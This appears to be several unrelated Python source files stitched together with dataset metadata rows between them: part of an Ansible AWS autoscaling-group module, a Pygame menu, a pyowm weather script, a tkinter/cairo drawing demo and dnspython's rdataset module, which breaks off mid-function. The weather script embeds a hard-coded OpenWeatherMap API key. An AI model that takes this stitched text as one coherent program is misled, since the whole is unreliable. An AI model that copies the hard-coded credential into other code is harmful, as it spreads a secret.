min_size = module.params['min_size']
max_size = module.params['max_size']
desired_capacity = module.params.get('desired_capacity')
vpc_zone_identifier = module.params.get('vpc_zone_identifier')
set_tags = module.params.get('tags')
health_check_period = module.params.get('health_check_period')
health_check_type = module.params.get('health_check_type')
default_cooldown = module.params.get('default_cooldown')
wait_for_instances = module.params.get('wait_for_instances')
as_groups = connection.get_all_groups(names=[group_name])
wait_timeout = module.params.get('wait_timeout')
termination_policies = module.params.get('termination_policies')
if not vpc_zone_identifier and not availability_zones:
region, ec2_url, aws_connect_params = get_aws_connection_info(module)
try:
ec2_connection = connect_to_aws(boto.ec2, region, **aws_connect_params)
except (boto.exception.NoAuthHandlerFound, AnsibleAWSError), e:
module.fail_json(msg=str(e))
elif vpc_zone_identifier:
vpc_zone_identifier = ','.join(vpc_zone_identifier)
asg_tags = []
for tag in set_tags:
for k,v in tag.iteritems():
if k !='propagate_at_launch':
asg_tags.append(Tag(key=k,
value=v,
propagate_at_launch=bool(tag.get('propagate_at_launch', True)),
resource_id=group_name))
if not as_groups:
if not vpc_zone_identifier and not availability_zones:
availability_zones = module.params['availability_zones'] = [zone.name for zone in ec2_connection.get_all_zones()]
enforce_required_arguments(module)
launch_configs = connection.get_all_launch_configurations(names=[launch_config_name])
ag = AutoScalingGroup(
group_name=group_name,
load_balancers=load_balancers,
availability_zones=availability_zones,
launch_config=launch_configs[0],
min_size=min_size,
max_size=max_size,
desired_capacity=desired_capacity,
vpc_zone_identifier=vpc_zone_identifier,
connection=connection,
tags=asg_tags,
health_check_period=health_check_period,
health_check_type=health_check_type,
default_cooldown=default_cooldown,
termination_policies=termination_policies)
try:
connection.create_auto_scaling_group(ag)
if wait_for_instances:
wait_for_new_inst(module, connection, group_name, wait_timeout, desired_capacity, 'viable_instances')
wait_for_elb(connection, module, group_name)
as_group = connection.get_all_groups(names=[group_name])[0]
asg_properties = get_properties(as_group)
changed = True
return(changed, asg_properties)
except BotoServerError, e:
module.fail_json(msg=str(e))
else:
as_group = as_groups[0]
changed = False
for attr in ASG_ATTRIBUTES:
if module.params.get(attr, None) is not None:
module_attr = module.params.get(attr)
if attr == 'vpc_zone_identifier':
module_attr = ','.join(module_attr)
group_attr = getattr(as_group, attr)
# we do this because AWS and the module may return the same list
# sorted differently
try:
module_attr.sort()
except:
pass
try:
group_attr.sort()
except:
pass
if group_attr != module_attr:
changed = True
setattr(as_group, attr, module_attr)
if len(set_tags) > 0:
have_tags = {}
want_tags = {}
for tag in asg_tags:
want_tags[tag.key] = [tag.value, tag.propagate_at_launch]
dead_tags = []
for tag in as_group.tags:
have_tags[tag.key] = [tag.value, tag.propagate_at_launch]
if tag.key not in want_tags:
changed = True
dead_tags.append(tag)
if dead_tags != []:
connection.delete_tags(dead_tags)
if have_tags != want_tags:
changed = True
connection.create_or_update_tags(asg_tags)
# handle loadbalancers separately because None != []
load_balancers = module.params.get('load_balancers') or []
if load_balancers and as_group.load_balancers != load_balancers:
changed = True
as_group.load_balancers = module.params.get('load_balancers')
if changed:
try:
as_group.update()
except BotoServerError, e:
module.fail_json(msg=str(e))
if wait_for_instances:
wait_for_new_inst(module, connection, group_name, wait_timeout, desired_capacity, 'viable_instances')
wait_for_elb(connection, module, group_name)
try:
as_group = connection.get_all_groups(names=[group_name])[0]
asg_properties = get_properties(as_group)
except BotoServerError, e:
module.fail_json(msg=str(e))
return(changed, asg_properties)
def delete_autoscaling_group(connection, module):
group_name = module.params.get('name')
groups = connection.get_all_groups(names=[group_name])
if groups:
group = groups[0]
group.max_size = 0
group.min_size = 0
group.desired_capacity = 0
group.update()
instances = True
while instances:
tmp_groups = connection.get_all_groups(names=[group_name])
if tmp_groups:
tmp_group = tmp_groups[0]
if not tmp_group.instances:
instances = False
time.sleep(10)
group.delete()
while len(connection.get_all_groups(names=[group_name])):
time.sleep(5)
changed=True
return changed
else:
changed=False
return changed
def get_chunks(l, n):
for i in xrange(0, len(l), n):
yield l[i:i+n]
def update_size(group, max_size, min_size, dc):
log.debug("setting ASG sizes")
log.debug("minimum size: {0}, desired_capacity: {1}, max size: {2}".format(min_size, dc, max_size ))
group.max_size = max_size
group.min_size = min_size
group.desired_capacity = dc
group.update()
def replace(connection, module):
batch_size = module.params.get('replace_batch_size')
wait_timeout = module.params.get('wait_timeout')
group_name = module.params.get('name')
max_size = module.params.get('max_size')
min_size = module.params.get('min_size')
desired_capacity = module.params.get('desired_capacity')
lc_check = module.params.get('lc_check')
replace_instances = module.params.get('replace_instances')
as_group = connection.get_all_groups(names=[group_name])[0]
wait_for_new_inst(module, connection, group_name, wait_timeout, as_group.min_size, 'viable_instances')
props = get_properties(as_group)
instances = props.get('instances', [])
if replace_instances:
instances = replace_instances
# check to see if instances are replaceable if checking launch configs
new_instances, old_instances = get_instances_by_lc(props, lc_check, instances)
num_new_inst_needed = desired_capacity - len(new_instances)
if lc_check:
if num_new_inst_needed == 0 and old_instances:
log.debug("No new instances needed, but old instances are present. Removing old instances")
terminate_batch(connection, module, old_instances, instances, True)
as_group = connection.get_all_groups(names=[group_name])[0]
props = get_properties(as_group)
changed = True
return(changed, props)
# we don't want to spin up extra instances if not necessary
if num_new_inst_needed < batch_size:
log.debug("Overriding batch size to {0}".format(num_new_inst_needed))
batch_size = num_new_inst_needed
if not old_instances:
changed = False
return(changed, props)
#check if min_size/max_size/desired capacity have been specified and if not use ASG values
if min_size is None:
min_size = as_group.min_size
if max_size is None:
max_size = as_group.max_size
if desired_capacity is None:
desired_capacity = as_group.desired_capacity
# set temporary settings and wait for them to be reached
    # This should get overridden if the number of instances left is less than the batch size.
as_group = connection.get_all_groups(names=[group_name])[0]
update_size(as_group, max_size + batch_size, min_size + batch_size, desired_capacity + batch_size)
wait_for_new_inst(module, connection, group_name, wait_timeout, as_group.min_size, 'viable_instances')
wait_for_elb(connection, module, group_name)
as_group = connection.get_all_groups(names=[group_name])[0]
props = get_properties(as_group)
instances = props.get('instances', [])
if replace_instances:
instances = replace_instances
log.debug("beginning main loop")
for i in get_chunks(instances, batch_size):
# break out of this loop if we have enough new instances
break_early, desired_size, term_instances = terminate_batch(connection, module, i, instances, False)
wait_for_term_inst(connection, module, term_instances)
wait_for_new_inst(module, connection, group_name, wait_timeout, desired_size, 'viable_instances')
wait_for_elb(connection, module, group_name)
as_group = connection.get_all_groups(names=[group_name])[0]
if break_early:
log.debug("breaking loop")
break
update_size(as_group, max_size, min_size, desired_capacity)
as_group = connection.get_all_groups(names=[group_name])[0]
asg_properties = get_properties(as_group)
log.debug("Rolling update complete.")
changed=True
return(changed, asg_properties)
def get_instances_by_lc(props, lc_check, initial_instances):
new_instances = []
old_instances = []
# old instances are those that have the old launch config
if lc_check:
for i in props.get('instances', []):
if props['instance_facts'][i]['launch_config_name'] == props['launch_config_name']:
new_instances.append(i)
else:
old_instances.append(i)
else:
log.debug("Comparing initial instances with current: {0}".format(initial_instances))
for i in props.get('instances', []):
if i not in initial_instances:
new_instances.append(i)
else:
old_instances.append(i)
log.debug("New instances: {0}, {1}".format(len(new_instances), new_instances))
log.debug("Old instances: {0}, {1}".format(len(old_instances), old_instances))
return new_instances, old_instances
def list_purgeable_instances(props, lc_check, replace_instances, initial_instances):
instances_to_terminate = []
instances = ( inst_id for inst_id in replace_instances if inst_id in props.get('instances', []))
# check to make sure instances given are actually in the given ASG
# and they have a non-current launch config
if lc_check:
for i in instances:
if props['instance_facts'][i]['launch_config_name'] != props['launch_config_name']:
instances_to_terminate.append(i)
else:
for i in instances:
if i in initial_instances:
instances_to_terminate.append(i)
return instances_to_terminate
def terminate_batch(connection, module, replace_instances, initial_instances, leftovers=False):
batch_size = module.params.get('replace_batch_size')
min_size = module.params.get('min_size')
desired_capacity = module.params.get('desired_capacity')
group_name = module.params.get('name')
wait_timeout = int(module.params.get('wait_timeout'))
lc_check = module.params.get('lc_check')
decrement_capacity = False
break_loop = False
as_group = connection.get_all_groups(names=[group_name])[0]
props = get_properties(as_group)
desired_size = as_group.min_size
new_instances, old_instances = get_instances_by_lc(props, lc_check, initial_instances)
num_new_inst_needed = desired_capacity - len(new_instances)
# check to make sure instances given are actually in the given ASG
# and they have a non-current launch config
instances_to_terminate = list_purgeable_instances(props, lc_check, replace_instances, initial_instances)
log.debug("new instances needed: {0}".format(num_new_inst_needed))
log.debug("new instances: {0}".format(new_instances))
log.debug("old instances: {0}".format(old_instances))
log.debug("batch instances: {0}".format(",".join(instances_to_terminate)))
if num_new_inst_needed == 0:
decrement_capacity = True
if as_group.min_size != min_size:
as_group.min_size = min_size
as_group.update()
log.debug("Updating minimum size back to original of {0}".format(min_size))
        # if there are some leftover old instances, but we are already at capacity with new ones
# we don't want to decrement capacity
if leftovers:
decrement_capacity = False
break_loop = True
instances_to_terminate = old_instances
desired_size = min_size
log.debug("No new instances needed")
if num_new_inst_needed < batch_size and num_new_inst_needed !=0 :
instances_to_terminate = instances_to_terminate[:num_new_inst_needed]
decrement_capacity = False
break_loop = False
log.debug("{0} new instances needed".format(num_new_inst_needed))
log.debug("decrementing capacity: {0}".format(decrement_capacity))
for instance_id in instances_to_terminate:
elb_dreg(connection, module, group_name, instance_id)
log.debug("terminating instance: {0}".format(instance_id))
connection.terminate_instance(instance_id, decrement_capacity=decrement_capacity)
# we wait to make sure the machines we marked as Unhealthy are
# no longer in the list
return break_loop, desired_size, instances_to_terminate
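# Worked example of the batch decision above (illustrative numbers): with
# desired_capacity=4, replace_batch_size=2 and 3 instances already on the new
# launch config, num_new_inst_needed is 1, which is non-zero and below the
# batch size, so only one old instance is terminated and capacity is not
# decremented. Once num_new_inst_needed reaches 0, old instances are
# terminated with decrement_capacity=True and min_size is restored; when
# called with leftovers=True at that point, every remaining old instance is
# purged without decrementing and the caller's loop is signalled to stop.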
def wait_for_term_inst(connection, module, term_instances):
batch_size = module.params.get('replace_batch_size')
wait_timeout = module.params.get('wait_timeout')
group_name = module.params.get('name')
lc_check = module.params.get('lc_check')
as_group = connection.get_all_groups(names=[group_name])[0]
props = get_properties(as_group)
count = 1
wait_timeout = time.time() + wait_timeout
while wait_timeout > time.time() and count > 0:
log.debug("waiting for instances to terminate")
count = 0
as_group = connection.get_all_groups(names=[group_name])[0]
props = get_properties(as_group)
instance_facts = props['instance_facts']
instances = ( i for i in instance_facts if i in term_instances)
for i in instances:
lifecycle = instance_facts[i]['lifecycle_state']
health = instance_facts[i]['health_status']
log.debug("Instance {0} has state of {1},{2}".format(i,lifecycle,health ))
if lifecycle == 'Terminating' or health == 'Unhealthy':  # 'health' is assigned above; 'healthy' was an undefined name
count += 1
time.sleep(10)
if wait_timeout <= time.time():
# waiting took too long
module.fail_json(msg = "Waited too long for old instances to terminate. %s" % time.asctime())
def wait_for_new_inst(module, connection, group_name, wait_timeout, desired_size, prop):
# make sure we have the latest stats after that last loop.
as_group = connection.get_all_groups(names=[group_name])[0]
props = get_properties(as_group)
log.debug("Waiting for {0} = {1}, currently {2}".format(prop, desired_size, props[prop]))
# now we make sure that we have enough instances in a viable state
wait_timeout = time.time() + wait_timeout
while wait_timeout > time.time() and desired_size > props[prop]:
log.debug("Waiting for {0} = {1}, currently {2}".format(prop, desired_size, props[prop]))
time.sleep(10)
as_group = connection.get_all_groups(names=[group_name])[0]
props = get_properties(as_group)
if wait_timeout <= time.time():
# waiting took too long
module.fail_json(msg = "Waited too long for new instances to become viable. %s" % time.asctime())
log.debug("Reached {0}: {1}".format(prop, desired_size))
return props
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(
dict(
name=dict(required=True, type='str'),
load_balancers=dict(type='list'),
availability_zones=dict(type='list'),
launch_config_name=dict(type='str'),
min_size=dict(type='int'),
max_size=dict(type='int'),
desired_capacity=dict(type='int'),
vpc_zone_identifier=dict(type='list'),
replace_batch_size=dict(type='int', default=1),
replace_all_instances=dict(type='bool', default=False),
replace_instances=dict(type='list', default=[]),
lc_check=dict(type='bool', default=True),
wait_timeout=dict(type='int', default=300),
state=dict(default='present', choices=['present', 'absent']),
tags=dict(type='list', default=[]),
health_check_period=dict(type='int', default=300),
health_check_type=dict(default='EC2', choices=['EC2', 'ELB']),
default_cooldown=dict(type='int', default=300),
wait_for_instances=dict(type='bool', default=True),
termination_policies=dict(type='list', default='Default')
),
)
module = AnsibleModule(
argument_spec=argument_spec,
mutually_exclusive = [['replace_all_instances', 'replace_instances']]
)
if not HAS_BOTO:
module.fail_json(msg='boto required for this module')
state = module.params.get('state')
replace_instances = module.params.get('replace_instances')
replace_all_instances = module.params.get('replace_all_instances')
region, ec2_url, aws_connect_params = get_aws_connection_info(module)
try:
connection = connect_to_aws(boto.ec2.autoscale, region, **aws_connect_params)
if not connection:
module.fail_json(msg="failed to connect to AWS for the given region: %s" % str(region))
except boto.exception.NoAuthHandlerFound, e:
module.fail_json(msg=str(e))
changed = create_changed = replace_changed = False
if state == 'present':
create_changed, asg_properties=create_autoscaling_group(connection, module)
elif state == 'absent':
changed = delete_autoscaling_group(connection, module)
module.exit_json( changed = changed )
if replace_all_instances or replace_instances:
replace_changed, asg_properties=replace(connection, module)
if create_changed or replace_changed:
changed = True
module.exit_json( changed = changed, **asg_properties )
if __name__ == '__main__':
main()
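# Illustrative playbook usage (a sketch; it assumes this file is shipped as
# the ec2_asg module, and the parameter names are taken from argument_spec
# above):
#
#   - ec2_asg:
#       name: my-asg
#       launch_config_name: my-lc-v2
#       min_size: 2
#       max_size: 6
#       desired_capacity: 4
#       replace_all_instances: yes
#       replace_batch_size: 2
#       wait_timeout: 600
#       region: us-east-1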
|
gpl-3.0
| -6,694,148,389,157,273,000
| 40.331731
| 232
| 0.645022
| false
| 3.857319
| true
| false
| false
|
sireliah/poniat
|
menu.py
|
1
|
2882
|
#-*- coding: utf-8 -*-
import sys
import pygame
from pygame.locals import *
from utils import *
from initial import LoadMenuTextures
class MainMenu(LoadMenuTextures):
def __init__(self, modes, win_w, win_h):
self.showmain = True
self.submenu = False
self.click = False
self.modes = modes
LoadMenuTextures.__init__(self, win_w, win_h)
self.menuloop()
def mousepos(self):
self.pos = pygame.mouse.get_pos()
def is_inside(self, coords):
x, y = self.pos
if (x > coords[0] and x < coords[4]) and (y > coords[1] and y < coords[5]):
return True
else:
return False
def startbutton(self):
if self.is_inside(self.start_coords):
self.start.show_button(hover=True)
if self.click:
self.showmain = False
else:
self.start.show_button()
def aboutbutton(self):
if self.is_inside(self.about_coords):
self.about.show_button(hover=True)
if self.click:
self.submenu = True
else:
self.about.show_button()
def gobackbutton(self):
if self.is_inside(self.goback_coords):
self.goback.show_button(hover=True)
if self.click:
self.submenu = False
else:
self.goback.show_button()
def exitbutton(self):
if self.is_inside(self.exit_coords):
self.exit.show_button(hover=True)
if self.click:
sys.exit()
else:
self.exit.show_button()
def events(self):
self.mousepos()
self.click = False
for event in pygame.event.get():
if event.type == QUIT:
print("koniec")  # Polish: "the end"
if event.type == KEYDOWN:
if event.key == K_ESCAPE:
exit()
if event.key == K_SPACE:
pass
if event.key == K_RETURN:
self.showmain = False
if event.key == K_LCTRL:
pass
elif event.type == MOUSEBUTTONDOWN:
self.click = True
def menuloop(self):
while self.showmain:
clear()
self.events()
self.mainback.show(0, 0)
if self.submenu:
self.aboutback.show(0, 0)
self.gobackbutton()
else:
self.startbutton()
self.aboutbutton()
self.exitbutton()
self.font.show(u"X: %s, Y: %s" % (self.pos), DARKRED, 10, 30, 1, 1)
pygame.display.flip()
clear()
self.mainback.show(0, 0)
self.frame.show(13, 14, 1.0, 1.0)
self.font.show(u"Ładuję...", DARKRED, 10, 30, 2, 2)
pygame.display.flip()
|
gpl-3.0
| 1,126,106,222,080,723,800
| 27.514851
| 83
| 0.498958
| false
| 3.829787
| false
| false
| false
|
FeodorM/some_code
|
some_nice_python_things/weather.py
|
1
|
2096
|
#! /usr/bin/env python3
import pyowm
import datetime
owm = pyowm.OWM('2642ecf7132b8918b8f073910006483c', language='ru')
now = pyowm.timeutils.now().date()
tomorrow = pyowm.timeutils.tomorrow().date()
def to_human_time(unix):
return datetime.datetime.fromtimestamp(unix)
def weather_date(weather):
return to_human_time(weather.get_reference_time()).date()
def temperature_to_str(weather):
rain = weather.get_rain()
if not rain:
rain = 'no rain'
return "{}: {}, {}C, {}, humidity: {}%\n".format(
to_human_time(weather.get_reference_time()).time(),
weather.get_detailed_status(),
weather.get_temperature('celsius')['temp'],
rain,
weather.get_humidity()
)
def forecast():
f = owm.three_hours_forecast('Voronezh,RU')
weathers = f.get_forecast().get_weathers()
if weather_date(weathers[0]) == now:
print('Сегодня:\n')  # Russian: "Today:"
for w in (weather for weather in weathers if weather_date(weather) == now):
print(temperature_to_str(w))
print('Завтра:\n')  # Russian: "Tomorrow:"
for w in (weather for weather in weathers if weather_date(weather) == tomorrow):
print(temperature_to_str(w))
def current_weather():
w = owm.weather_at_place('Voronezh,RU').get_weather()
print("""
{}
Temperature: {}C -- {}C ({}C)
Clouds: {}%
Rain: {}
Humidity: {}%
Wind speed: {}m/s
Time: {}
""".format(
w.get_detailed_status(),
w.get_temperature('celsius')['temp_min'],
w.get_temperature('celsius')['temp_max'],
w.get_temperature('celsius')['temp'],
w.get_clouds(),
w.get_rain(),
w.get_humidity(),
w.get_wind()['speed'],
w.get_reference_time('iso')
))
if __name__ == '__main__':
import sys
arg = '' if len(sys.argv) == 1 else sys.argv[1]
if arg == '':
current_weather()
forecast()
elif arg == '-n' or arg == '--now':
current_weather()
elif arg == '-f' or arg == '--forecast':
forecast()
else:
print('Wrong argument')
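# Example invocations, based on the argument handling above:
#   ./weather.py             -> current weather followed by the forecast
#   ./weather.py --now       -> current weather only
#   ./weather.py --forecast  -> forecast only
#   anything else            -> prints 'Wrong argument'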
|
mit
| 2,245,925,329,467,947,500
| 23.797619
| 84
| 0.572732
| false
| 3.194785
| false
| false
| false
|
jeremiedecock/snippets
|
python/tkinter/python3/cairo_with_pil.py
|
1
|
3643
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright (c) 2015 Jérémie DECOCK (http://www.jdhp.org)
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# SEE: http://stackoverflow.com/questions/25480853/cairo-with-tkinter
# http://effbot.org/tkinterbook/photoimage.htm#patterns
# Required Debian package (Debian 8.1 Jessie): python3-pil.imagetk
import tkinter as tk
import PIL.Image as pil # PIL.Image is a module not a class...
import PIL.ImageTk as piltk # PIL.ImageTk is a module not a class...
import cairo
if tk.TkVersion < 8.6:
print("*" * 80)
print("WARNING: Tk version {} is installed on your system.".format(tk.TkVersion))
print("Tk < 8.6 only supports three file formats: GIF, PGM and PPM.")
print("You need to install Tk >= 8.6 if you want to read JPEG and PNG images!")
print("*" * 80)
# CAIRO
w, h = 800, 600
cairo_surface = cairo.ImageSurface(cairo.FORMAT_ARGB32, w, h)
cairo_context = cairo.Context(cairo_surface)
# Draw something
cairo_context.scale(w, h)
cairo_context.rectangle(0, 0, 1, 1)
cairo_context.set_source_rgba(1, 0, 0, 0.8)
cairo_context.fill()
# TKINTER
# WARNING:
# A Tk window MUST be created before you can call PhotoImage!
# See: http://stackoverflow.com/questions/3177231/python-pil-imagetk-photoimage-is-giving-me-a-bus-error
# http://stackoverflow.com/questions/1236540/how-do-i-use-pil-with-tkinter
root = tk.Tk()
# PIL
# WARNING:
# You must keep a reference to the image object in your Python program,
# either by storing it in a global variable, or by attaching it to another
# object!
#
# When a PhotoImage object is garbage-collected by Python (e.g. when you
# return from a function which stored an image in a local variable), the
# image is cleared even if it’s being displayed by a Tkinter widget.
#
# To avoid this, the program must keep an extra reference to the image
# object. A simple way to do this is to assign the image to a widget
# attribute, like this:
#
# label = Label(image=tk_photo)
# label.image = tk_photo # keep a reference!
# label.pack()
#
# (src: http://effbot.org/tkinterbook/photoimage.htm#patterns)
# See also http://infohost.nmt.edu/tcc/help/pubs/pil/image-tk.html
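# A minimal sketch of the pattern described above (not used by this demo):
# the widget keeps the PhotoImage alive by holding an attribute reference.
def _make_image_label(parent, pil_img):
    photo = piltk.PhotoImage(pil_img)
    label = tk.Label(parent, image=photo)
    label.image = photo  # keep a reference so the image is not garbage-collected
    label.pack()
    return label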
# WARNING:
# "cairo_surface.get_data()" is not yet implemented for Python3 (but it works with Python2).
# See http://www.cairographics.org/documentation/pycairo/3/reference/surfaces.html#cairo.ImageSurface.get_data
pil_image = pil.frombuffer("RGBA", (w,h), cairo_surface.get_data(), "raw", "BGRA", 0, 1)
tk_photo = piltk.PhotoImage(pil_image)
# TKINTER
label = tk.Label(root, image=tk_photo)
label.pack()
root.mainloop()
|
mit
| 2,852,471,698,596,769,000
| 34.676471
| 110
| 0.732344
| false
| 3.332418
| false
| false
| false
|
ostinelli/pyopenspime
|
lib/dns/rdataset.py
|
1
|
11607
|
# Copyright (C) 2001-2007 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""DNS rdatasets (an rdataset is a set of rdatas of a given type and class)"""
import random
import StringIO
import struct
import dns.exception
import dns.rdatatype
import dns.rdataclass
import dns.rdata
import dns.set
# define SimpleSet here for backwards compatibility
SimpleSet = dns.set.Set
class DifferingCovers(dns.exception.DNSException):
"""Raised if an attempt is made to add a SIG/RRSIG whose covered type
is not the same as that of the other rdatas in the rdataset."""
pass
class IncompatibleTypes(dns.exception.DNSException):
"""Raised if an attempt is made to add rdata of an incompatible type."""
pass
class Rdataset(dns.set.Set):
"""A DNS rdataset.
@ivar rdclass: The class of the rdataset
@type rdclass: int
@ivar rdtype: The type of the rdataset
@type rdtype: int
@ivar covers: The covered type. Usually this value is
dns.rdatatype.NONE, but if the rdtype is dns.rdatatype.SIG or
dns.rdatatype.RRSIG, then the covers value will be the rdata
type the SIG/RRSIG covers. The library treats the SIG and RRSIG
types as if they were a family of
types, e.g. RRSIG(A), RRSIG(NS), RRSIG(SOA). This makes RRSIGs much
easier to work with than if RRSIGs covering different rdata
types were aggregated into a single RRSIG rdataset.
@type covers: int
@ivar ttl: The DNS TTL (Time To Live) value
@type ttl: int
"""
__slots__ = ['rdclass', 'rdtype', 'covers', 'ttl']
def __init__(self, rdclass, rdtype, covers=dns.rdatatype.NONE):
"""Create a new rdataset of the specified class and type.
@see: the description of the class instance variables for the
meaning of I{rdclass} and I{rdtype}"""
super(Rdataset, self).__init__()
self.rdclass = rdclass
self.rdtype = rdtype
self.covers = covers
self.ttl = 0
def _clone(self):
obj = super(Rdataset, self)._clone()
obj.rdclass = self.rdclass
obj.rdtype = self.rdtype
obj.covers = self.covers
obj.ttl = self.ttl
return obj
def update_ttl(self, ttl):
"""Set the TTL of the rdataset to be the lesser of the set's current
TTL or the specified TTL. If the set contains no rdatas, set the TTL
to the specified TTL.
@param ttl: The TTL
@type ttl: int"""
if len(self) == 0:
self.ttl = ttl
elif ttl < self.ttl:
self.ttl = ttl
def add(self, rd, ttl=None):
"""Add the specified rdata to the rdataset.
If the optional I{ttl} parameter is supplied, then
self.update_ttl(ttl) will be called prior to adding the rdata.
@param rd: The rdata
@type rd: dns.rdata.Rdata object
@param ttl: The TTL
@type ttl: int"""
#
# If we're adding a signature, do some special handling to
# check that the signature covers the same type as the
# other rdatas in this rdataset. If this is the first rdata
# in the set, initialize the covers field.
#
if self.rdclass != rd.rdclass or self.rdtype != rd.rdtype:
raise IncompatibleTypes
if not ttl is None:
self.update_ttl(ttl)
if self.rdtype == dns.rdatatype.RRSIG or \
self.rdtype == dns.rdatatype.SIG:
covers = rd.covers()
if len(self) == 0 and self.covers == dns.rdatatype.NONE:
self.covers = covers
elif self.covers != covers:
raise DifferingCovers
if dns.rdatatype.is_singleton(rd.rdtype) and len(self) > 0:
self.clear()
super(Rdataset, self).add(rd)
def union_update(self, other):
self.update_ttl(other.ttl)
super(Rdataset, self).union_update(other)
def intersection_update(self, other):
self.update_ttl(other.ttl)
super(Rdataset, self).intersection_update(other)
def update(self, other):
"""Add all rdatas in other to self.
@param other: The rdataset from which to update
@type other: dns.rdataset.Rdataset object"""
self.update_ttl(other.ttl)
super(Rdataset, self).update(other)
def __repr__(self):
if self.covers == 0:
ctext = ''
else:
ctext = '(' + dns.rdatatype.to_text(self.covers) + ')'
return '<DNS ' + dns.rdataclass.to_text(self.rdclass) + ' ' + \
dns.rdatatype.to_text(self.rdtype) + ctext + ' rdataset>'
def __str__(self):
return self.to_text()
def __eq__(self, other):
"""Two rdatasets are equal if they have the same class, type, and
covers, and contain the same rdata.
@rtype: bool"""
if not isinstance(other, Rdataset):
return False
if self.rdclass != other.rdclass or \
self.rdtype != other.rdtype or \
self.covers != other.covers:
return False
return super(Rdataset, self).__eq__(other)
def __ne__(self, other):
return not self.__eq__(other)
def to_text(self, name=None, origin=None, relativize=True,
override_rdclass=None, **kw):
"""Convert the rdataset into DNS master file format.
@see: L{dns.name.Name.choose_relativity} for more information
on how I{origin} and I{relativize} determine the way names
are emitted.
Any additional keyword arguments are passed on to the rdata
to_text() method.
@param name: If name is not None, emit a RRs with I{name} as
the owner name.
@type name: dns.name.Name object
@param origin: The origin for relative names, or None.
@type origin: dns.name.Name object
@param relativize: True if names should names be relativized
@type relativize: bool"""
if not name is None:
name = name.choose_relativity(origin, relativize)
ntext = str(name)
pad = ' '
else:
ntext = ''
pad = ''
s = StringIO.StringIO()
if not override_rdclass is None:
rdclass = override_rdclass
else:
rdclass = self.rdclass
if len(self) == 0:
#
# Empty rdatasets are used for the question section, and in
# some dynamic updates, so we don't need to print out the TTL
# (which is meaningless anyway).
#
print >> s, '%s%s%s %s' % (ntext, pad,
dns.rdataclass.to_text(rdclass),
dns.rdatatype.to_text(self.rdtype))
else:
for rd in self:
print >> s, '%s%s%d %s %s %s' % \
(ntext, pad, self.ttl, dns.rdataclass.to_text(rdclass),
dns.rdatatype.to_text(self.rdtype),
rd.to_text(origin=origin, relativize=relativize, **kw))
#
# We strip off the final \n for the caller's convenience in printing
#
return s.getvalue()[:-1]
def to_wire(self, name, file, compress=None, origin=None,
override_rdclass=None, want_shuffle=True):
"""Convert the rdataset to wire format.
@param name: The owner name of the RRset that will be emitted
@type name: dns.name.Name object
@param file: The file to which the wire format data will be appended
@type file: file
@param compress: The compression table to use; the default is None.
@type compress: dict
@param origin: The origin to be appended to any relative names when
they are emitted. The default is None.
@returns: the number of records emitted
@rtype: int
"""
if not override_rdclass is None:
rdclass = override_rdclass
want_shuffle = False
else:
rdclass = self.rdclass
file.seek(0, 2)
if len(self) == 0:
name.to_wire(file, compress, origin)
stuff = struct.pack("!HHIH", self.rdtype, rdclass, 0, 0)
file.write(stuff)
return 1
else:
if want_shuffle:
l = list(self)
random.shuffle(l)
else:
l = self
for rd in l:
name.to_wire(file, compress, origin)
stuff = struct.pack("!HHIH", self.rdtype, rdclass,
self.ttl, 0)
file.write(stuff)
start = file.tell()
rd.to_wire(file, compress, origin)
end = file.tell()
assert end - start < 65536
file.seek(start - 2)
stuff = struct.pack("!H", end - start)
file.write(stuff)
file.seek(0, 2)
return len(self)
def match(self, rdclass, rdtype, covers):
"""Returns True if this rdataset matches the specified class, type,
and covers"""
if self.rdclass == rdclass and \
self.rdtype == rdtype and \
self.covers == covers:
return True
return False
def from_text_list(rdclass, rdtype, ttl, text_rdatas):
"""Create an rdataset with the specified class, type, and TTL, and with
the specified list of rdatas in text format.
@rtype: dns.rdataset.Rdataset object
"""
if isinstance(rdclass, str):
rdclass = dns.rdataclass.from_text(rdclass)
if isinstance(rdtype, str):
rdtype = dns.rdatatype.from_text(rdtype)
r = Rdataset(rdclass, rdtype)
r.update_ttl(ttl)
for t in text_rdatas:
rd = dns.rdata.from_text(r.rdclass, r.rdtype, t)
r.add(rd)
return r
def from_text(rdclass, rdtype, ttl, *text_rdatas):
"""Create an rdataset with the specified class, type, and TTL, and with
the specified rdatas in text format.
@rtype: dns.rdataset.Rdataset object
"""
return from_text_list(rdclass, rdtype, ttl, text_rdatas)
def from_rdata_list(ttl, rdatas):
"""Create an rdataset with the specified TTL, and with
the specified list of rdata objects.
@rtype: dns.rdataset.Rdataset object
"""
if len(rdatas) == 0:
raise ValueError, "rdata list must not be empty"
r = None
for rd in rdatas:
if r is None:
